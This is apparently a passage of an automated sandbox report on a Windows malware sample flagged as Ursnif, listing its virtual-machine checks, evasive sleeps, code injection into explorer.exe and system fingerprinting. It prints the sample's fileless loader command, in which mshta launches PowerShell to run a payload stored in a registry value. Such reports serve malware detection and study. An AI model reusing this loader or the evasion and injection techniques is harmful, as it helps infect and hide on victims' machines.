Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5156
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3564

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520

Thread sleep time: -9223372036854770s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_02773512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_02773512
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05415518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	2_2_05415518
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05404CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	2_2_05404CF1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	2_2_0540B88D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_0540834C

Source: C:\Windows\SysWOW64\regsvr32.exe

2_2_054016E1

Source: explorer.exe, 00000024.00000002.616609988.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.413817757.000000000374F000.00000004.00000001.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000024.00000000.413817757.000000000374F000.00000004.00000001.sdmp	Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000024.00000000.411669645.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000024.00000000.430548360.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000024.00000002.622481126.00000000053D7000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000024.00000000.430548360.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0542556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_0542556E

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05401F12 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

2_2_05401F12

HIPS / PFW / Operating System Protection Evasion:

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: EB0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 3020000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: 40

Maps a DLL or memory area into another process

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3472
Source: C:\Windows\explorer.exe	Thread register set: target process: 4016
Source: C:\Windows\explorer.exe	Thread register set: target process: 4288
Source: C:\Windows\explorer.exe	Thread register set: target process: 4448
Source: C:\Windows\explorer.exe	Thread register set: target process: 5936
Source: C:\Windows\explorer.exe	Thread register set: target process: 6488
Source: C:\Windows\explorer.exe	Thread register set: target process: 2092

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6678212E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6678212E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: EB0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 3020000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000024.00000000.411588453.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0277A12A cpuid

2_2_0277A12A

Queries the installation date of Windows

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05405F90 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

2_2_05405F90

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_027712E8 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

2_2_027712E8

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0277A12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

2_2_0277A12A

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0277A667 GetVersionExA,wsprintfA,

2_2_0277A667

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
